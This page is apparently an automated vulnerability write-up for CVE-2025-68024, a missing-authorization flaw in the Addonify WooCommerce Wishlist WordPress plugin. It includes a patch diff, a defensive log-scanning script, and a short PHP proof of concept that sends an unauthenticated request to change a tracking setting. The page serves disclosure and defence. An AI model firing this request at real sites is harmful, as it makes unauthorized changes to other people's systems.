Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-68024: Addonify – WooCommerce Wishlist <= 2.0.15 – Missing Authorization to Unauthenticated Settings Update (addonify-wishlist)

Severity: Medium (CVSS 5.3)
CWE: 862 (Missing Authorization)
Vulnerable Version: 2.0.15
Patched Version: 2.0.16
Disclosed: February 3, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-68024:
This vulnerability is a missing authorization flaw in the Addonify – WooCommerce Wishlist WordPress plugin, affecting versions up to and including 2.0.15. The issue allows unauthenticated attackers to perform unauthorized actions, leading to a CVSS score of 5.3 (Medium severity).

Atomic Edge research identifies the root cause in the `process_user_tracking_choice` function within the file `addonify-wishlist/includes/udp/class-udp-agent.php`. The function processes a user’s choice for tracking permissions. Before the patch, the function lacked any capability or authentication check. This omission allowed any unauthenticated user to trigger the function’s logic by accessing its associated endpoint.

Exploitation involves sending a GET request to the plugin’s user data processing endpoint. The exact URI path is not explicitly shown in the diff, but the function is triggered via a hook or direct call. The attacker must supply the `udp-agent-allow-access` parameter in the request. The parameter value is sanitized but its processing leads to an unauthorized state change, such as altering plugin settings related to data tracking.

The patch adds an authorization check at the beginning of the `process_user_tracking_choice` function. The fix inserts a conditional statement verifying that the current user is both logged in (`is_user_logged_in()`) and possesses the `manage_options` capability (`current_user_can('manage_options')`). If the check fails, the user is redirected to the site's homepage with `wp_safe_redirect( home_url() )` and script execution stops. This change ensures only administrators can perform the action, remediating the missing authorization flaw.

Successful exploitation allows an unauthenticated attacker to modify plugin settings related to user data tracking. While the specific impact of the `udp-agent-allow-access` parameter is not detailed, unauthorized changes to tracking or data-sharing preferences could violate user privacy expectations or compliance standards. The vulnerability does not directly lead to remote code execution or site takeover, but it constitutes an unauthorized privilege action.
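For defenders, the quickest way to spot attempts against this flaw is the request parameter itself, which is the same before and after the patch. The following is an added example (not Atomic Edge's or the plugin's code) that parses combined-format access-log lines, extracts every request carrying `udp-agent-allow-access`, and classifies it by response status: the patched plugin answers unauthorized callers with a redirect to the home page, so a 3xx is expected on 2.0.16, while a 200 deserves a closer look. The log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [18/Mar/2026:10:01:02 +0000] "GET /?udp-agent-allow-access=yes HTTP/1.1" 200 512 "-" "curl/8.0"
203.0.113.10 - - [18/Mar/2026:10:01:05 +0000] "POST /wp-admin/admin-ajax.php?udp-agent-allow-access=no HTTP/1.1" 302 0 "-" "curl/8.0"
198.51.100.7 - - [18/Mar/2026:10:02:00 +0000] "GET /shop/ HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [ts] "METHOD target PROTO" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# The parameter read by process_user_tracking_choice() (from the diff).
PARAM = "udp-agent-allow-access"


def find_udp_requests(log_text):
    """Return one record per request whose query string carries PARAM."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        parts = urlsplit(m.group("target"))
        query = parse_qs(parts.query)
        if PARAM not in query:
            continue
        status = int(m.group("status"))
        hits.append({
            "ip": m.group("ip"),
            "ts": m.group("ts"),
            "method": m.group("method"),
            "path": parts.path,
            "choice": query[PARAM][0],
            "status": status,
            # Patched plugin (2.0.16) redirects unauthorized callers to home_url(),
            # so a 3xx means the guard fired; anything else needs manual review.
            "verdict": "blocked" if status in (301, 302) else "review",
        })
    return hits


if __name__ == "__main__":
    for hit in find_udp_requests(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} {hit['method']} {hit['path']} "
              f"choice={hit['choice']} status={hit['status']} -> {hit['verdict']}")
```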

Differential between vulnerable and patched code

Code Diff
--- a/addonify-wishlist/addonify-wishlist.php
+++ b/addonify-wishlist/addonify-wishlist.php
@@ -10,9 +10,9 @@
  * Plugin Name:       Addonify - WooCommerce Wishlist
  * Plugin URI:        https://wordpress.org/plugins/addonify-wishlist
  * Description:       Addonify WooCommerce Wishlist is a light-weight yet powerful tool that adds a wishlist functionality to your e-commerce shop.
- * Version:           2.0.15
+ * Version:           2.0.16
  * Requires at least: 6.3
- * Tested up to:      6.8
+ * Tested up to:      6.9.1
  * Requires PHP:      7.4
  * Author:            Addonify
  * Author URI:        https://www.addonify.com
@@ -28,7 +28,7 @@
 	die;
 }

-define( 'ADDONIFY_WISHLIST_VERSION', '2.0.15' );
+define( 'ADDONIFY_WISHLIST_VERSION', '2.0.16' );
 define( 'ADDONIFY_WISHLIST_DB_INITIALS', 'addonify_wishlist_' );
 define( 'ADDONIFY_WISHLIST_PLUGIN_PATH', __DIR__ );
 define( 'ADDONIFY_WISHLIST_PLUGIN_FILE', __FILE__ );
--- a/addonify-wishlist/includes/udp/class-udp-agent.php
+++ b/addonify-wishlist/includes/udp/class-udp-agent.php
@@ -177,6 +177,11 @@
 	 * @since    1.0.0
 	 */
 	private function process_user_tracking_choice() {
+		// Verify if the user is logged in and has the capability to manage options.
+		if ( ! is_user_logged_in() || ! current_user_can( 'manage_options' ) ) {
+			wp_safe_redirect( home_url() );
+			exit;
+		}

 		$users_choice = isset( $_GET['udp-agent-allow-access'] ) ? sanitize_text_field( wp_unslash( $_GET['udp-agent-allow-access'] ) ) : ''; //phpcs:ignore

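Review bot: The new guard closes the unauthenticated path, but the handler still performs a state change from a plain request parameter (`$_GET['udp-agent-allow-access']`) with no nonce verification, so a logged-in administrator can still be induced to submit it from another origin; add `check_admin_referer()` (or `wp_verify_nonce()` on a nonce carried in the request) after the capability check. Minor: `is_user_logged_in()` is redundant here, since `current_user_can( 'manage_options' )` is already false for anonymous users.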
Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-68024 - Addonify – WooCommerce Wishlist <= 2.0.15 - Missing Authorization to Unauthenticated Settings Update

// Target WordPress site URL
$target_url = 'https://example.com';

// The vulnerable function reads its parameter from $_GET (see the diff), so the
// request must carry it in the query string. The exact hook/action that reaches
// process_user_tracking_choice() is not shown in the diff; the action name below
// is a guess at a common WordPress admin-ajax pattern and may need adjusting.
$endpoint = $target_url . '/wp-admin/admin-ajax.php';

// Parameter required to trigger the vulnerable function.
$payload = array(
    'action'                 => 'addonify_wishlist_udp_agent', // assumed, not confirmed by the diff
    'udp-agent-allow-access' => 'yes',
);

// Initialize cURL session and send the parameters as a GET query string.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $endpoint . '?' . http_build_query($payload));
curl_setopt($ch, CURLOPT_HTTPGET, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false); // keep a patched site's redirect visible
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing only.
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); // For testing only.

// Execute the request.
$response = curl_exec($ch);
if ($response === false) {
    fwrite(STDERR, 'cURL error: ' . curl_error($ch) . "\n");
}
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Analyze response.
echo "HTTP Status: $http_code\n";
echo "Response: $response\n";
// A patched site (2.0.16 or later) answers an unauthenticated request with a
// 302 redirect to the home page; a 200 response warrants closer inspection.
?>
